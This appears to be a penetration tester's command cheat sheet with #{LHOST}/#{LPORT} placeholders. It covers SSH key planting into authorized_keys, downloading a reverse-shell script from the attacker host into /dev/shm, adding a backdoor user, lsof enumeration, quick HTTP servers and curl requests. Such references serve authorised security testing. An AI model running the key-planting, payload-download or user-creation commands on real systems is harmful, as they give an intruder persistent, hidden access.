# Add public key to authorized keys
# desc: Add SSH
curl https://#{LHOST}:#{LPORT}/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys

# desc: Download in RAM
wget #{LHOST}:#{LPORT}/#{file} -O /dev/shm/.rev.py
wget #{LHOST}:#{LPORT}/#{file} -P /dev/shm
curl #{LHOST}:#{LPORT}/#{file} -o /dev/shm/shell.py
@file.desc(backconnect file)

#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by networks processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80

# desc: Add new user
useradd -p 'openssl passwd -1 #{PWD}' #{USER}

# desc: HTTP servers
python -m SimpleHTTPServer #{LPORT}

# desc: HTTP servers
python3 -m http.server #{LPORT}

# desc: HTTP servers
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => #{LPORT}, :DocumentRoot => Dir.pwd).start"

# desc: HTTP servers
php -S $ip:#{LPORT}

# desc: Curl POST
# json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3001/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

# desc: Send Email
# You will be prompted for the content
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf 

# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101
